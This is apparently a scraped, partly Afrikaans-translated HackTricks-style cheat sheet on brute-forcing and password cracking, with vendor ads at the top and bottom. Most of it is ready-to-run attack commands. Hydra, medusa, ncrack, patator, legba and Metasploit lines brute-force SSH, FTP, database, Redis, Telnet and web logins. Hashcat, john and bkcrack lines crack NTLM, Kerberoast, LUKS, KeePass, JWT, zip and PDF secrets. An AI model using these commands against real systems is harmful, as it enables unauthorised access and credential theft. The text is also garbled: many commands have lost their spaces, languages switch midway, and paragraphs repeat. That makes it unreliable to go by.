Gebruik Trickest om maklik en outomatiese werksvloei te bou wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.
Kry Toegang Vandag:
Vind soveel moontlik inligting oor die teiken en genereer 'n aangepaste woordeboek. Gereedskap wat kan help:
Crunch
crunch460123456789ABCDEF-ocrunch1.txt#From length 4 to 6 using that alphabetcrunch44-f/usr/share/crunch/charset.lstmixalpha# Only length 4 using charset mixalpha (inside file charset.lst)@Lowercasealphacharacters,Uppercasealphacharacters%Numericcharacters^Specialcharactersincludingspaccrunch68-t,@@^^%%
'n Woordelysgeneratortool, wat jou toelaat om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegewe woorde te skep, 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken.
AJP (Apache JServ Protocol) is a binary protocol that can be used to proxy requests from a web server to a Java application server. It is important to note that AJP is not encrypted, so sensitive information can be exposed if intercepted.
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be effective against weak passwords but is time-consuming and resource-intensive. It is important to use strong, complex passwords to protect against brute force attacks.
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to FTP servers. It is important to use strong and unique passwords to prevent successful brute force attacks.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
Vir https moet jy verander van "http-post-form" na "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla of (D)rupal of (M)oodle
cmsmap-fW/J/D/M-ua-pahttps://wordpress.com# Check also https://github.com/evilsocket/legba/wiki/HTTP
IMAP
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. When a hacker is attempting to brute force IMAP credentials, they typically use a list of common usernames and passwords. This is done by using automated tools that systematically try all possible combinations until the correct one is found.
IRC (Internet Relay Chat) is 'n protokol wat gebruik word vir instandhouding van gesprekke via 'n netwerk. Dit kan gebruik word vir kommunikasie, maar dit word ook dikwels deur hackers gebruik vir kommunikasie en samevoeging van hulpbronne.
Brute force attacks against MSSQL servers can be performed using tools like Hydra or Ncrack. These tools allow an attacker to systematically check all possible passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the password is weak. It is recommended to use strong, complex passwords and implement account lockout policies to prevent successful brute force attacks.
Brute force attacks are a common way to gain unauthorized access to a MySQL database. In a brute force attack, the hacker tries all possible combinations of usernames and passwords until the correct one is found. This can be done using automated tools that systematically generate and test different combinations. To protect against brute force attacks, it is important to use strong and unique passwords, limit login attempts, and implement multi-factor authentication where possible.
# hydrahydra-Lusernames.txt-Ppass.txt<IP>mysql# msfconsolemsf>useauxiliary/scanner/mysql/mysql_login; setVERBOSEfalse# medusamedusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legbalegbamysql--usernameroot--passwordwordlists/passwords.txt--targetlocalhost:3306
OracleSQL
Brute Force
Brute force is a straightforward attack method that involves trying all possible combinations of a password until the correct one is found. This method can be effective but is also time-consuming. It is important to note that brute force attacks can be detected and blocked by security measures such as account lockouts after a certain number of failed attempts.
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.pypasswordguesser-s $SERVER -d $SID./odat.pypasswordguesser-s $MYSERVER -p $PORT --accounts-fileaccounts_multiple.txt#msf1msf>useadmin/oracle/oracle_loginmsf>setRHOSTS<IP>msf>setRPORT1521msf>setSID<SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf>usescanner/oracle/oracle_loginmsf>setRHOSTS<IP>msf>setRPORTS1521msf>setSID<SID>#for some reason nmap fails sometimes when executing this scriptnmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=<SID><IP>legbaoracle--targetlocalhost:1521--oracle-databaseSYSTEM--usernameadmin--passworddata/passwords.txt
Om oracle_login met patator te gebruik, moet jy dit installeer:
Brute force attacks are one of the most common and effective ways to obtain a password. This attack method involves an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. Brute force attacks can be time-consuming but are often successful.
Afrikaans Translation
Brute Force
Brute force-aanvalle is een van die mees algemene en doeltreffende maniere om 'n wagwoord te verkry. Hierdie aanvalsmetode behels 'n aanvaller wat baie wagwoorde of frases probeer met die hoop om uiteindelik reg te raai. Brute force-aanvalle kan tydrowend wees, maar is dikwels suksesvol.
Redis is 'n in-memory data store wat dikwels gebruik word vir caching en sessiebeheer in webtoepassings. Dit kan ook gebruik word vir die stoor van datastrukture soos lys, kaarte en stelle.
msf>useauxiliary/scanner/redis/redis_loginnmap--scriptredis-brute-p6379<IP>hydra–P/path/pass.txtredis://<IP>:<PORT># 6379 is the defaultlegbaredis--targetlocalhost:6379--usernameadmin--passworddata/passwords.txt [--redis-ssl]
Rexec
Rexec is 'n protokol wat gebruik word om 'n program op 'n afstand te hardloop. Dit kan gebruik word vir die uitvoering van programme op 'n afstand en kan 'n potensiële aanvalsoppervlak wees vir aanvallers wat brute force-tegnieke gebruik.
Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually used when the key space is small enough to be searched quickly. It is a simple but powerful technique that can be effective against weak passwords.
legbasftp--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbasftp--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
#Use the NetBIOS name of the machine as domaincrackmapexecmssql<IP>-d<DomainName>-uusernames.txt-ppasswords.txthydra-L/root/Desktop/user.txt–P/root/Desktop/pass.txt<IP>mssqlmedusa-h<IP>–U/root/Desktop/user.txt–P/root/Desktop/pass.txt–Mmssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
SSH
SSH (Secure Shell) is 'n veilige protokol wat gebruik word om veilige kommunikasie oor 'n onveilige netwerk te voer.
hydra-lroot-Ppasswords.txt [-t 32]<IP>sshncrack-p22--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Msshpatator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legbassh--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbassh--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
Swakke SSH-sleutels / Debian voorspelbare PRNG
Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n aansienlik verminderde sleutelruimte wat met gereedskap soos snowdroppe/ssh-keybrute gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos g0tmi1k/debian-ssh.
STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ)
Die STOMP-teksprotokol is 'n wyd gebruikte boodskapprotokol wat naatlose kommunikasie en interaksie met gewilde boodskie-opeenhopingsdiens soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapbedrywighede uit te voer.
hydra-lroot-Ppasswords.txt [-t 32]<IP>telnetncrack-p23--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Mtelnetlegbatelnet \--username admin \--password wordlists/passwords.txt \--target localhost:23 \--telnet-user-prompt "login: " \--telnet-pass-prompt "Password: " \--telnet-prompt ":~$ " \--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
VNC
VNC is 'n baie algemene protokol wat gebruik word vir die beheer van rekenaars oor 'n netwerk. Dit kan gebruik word vir die uitvoering van aanvalle deur middel van 'n brute force-aanval om toegang te verkry tot VNC-sessies.
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Bekende platte teks zip-aanval
Jy moet die platte teks (of 'n deel van die platte teks) van 'n lêer wat binne-in die versleutelde zip lê, ken. Jy kan lêernaam en grootte van lêers wat binne-in 'n versleutelde zip lê, nagaan deur: 7z l encrypted.zip uit te voer
Laai bkcrackvan die vrystellingsbladsy af.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
PDF
Brute-force attacks against PDF files are relatively common due to the popularity of the format and the sensitive information often contained within. Attackers may use tools like pdfcrack or pdfcrack-ng to attempt to crack the password protecting a PDF file. These tools work by systematically trying all possible passwords until the correct one is found. It is important to use strong, complex passwords to protect PDF files from brute-force attacks.
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
NTLM kraak
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Metode 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
PGP/GPG Privaatsleutel
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
As jy 'n xlsx-lêer het met 'n kolom wat deur 'n wagwoord beskerm word, kan jy dit ontgrendel:
Laai dit op na Google Drive en die wagwoord sal outomaties verwyder word
Om dit handmatig te verwyder:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
PFX Sertifikate
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Gebruik Trickest om maklik werkstrome te bou en te outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.
Kry Toegang Vandag:
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
Woordelys kombinasie aanval
Dit is moontlik om 2 woordelyste in 1 te kombineer met hashcat.
As lys 1 die woord "hello" bevat het en die tweede 2 reëls met die woorde "world" en "earth" bevat het. Die woorde helloworld en helloearth sal gegenereer word.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
Mask aanval (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
Hashcat metodes
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Brute Force
Brute force is a common attack method used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. In the context of cracking Linux hashes from the /etc/shadow file, brute force can be employed to guess the passwords associated with the hashed values. This method requires significant computational power and time, especially for complex passwords.
Brute-force attacks involve systematically checking all possible keys or passwords until the correct one is found. This method is commonly used to crack Windows hashes.
Aanval met Geweld
Aanvalle met geweld behels die sistematiese nagaan van alle moontlike sleutels of wagwoorde totdat die regte een gevind word. Hierdie metode word dikwels gebruik om Windows-hashtags te kraak.
Gebruik Trickest om maklik te bou en werkstrome outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.
Kry Vandag Toegang:
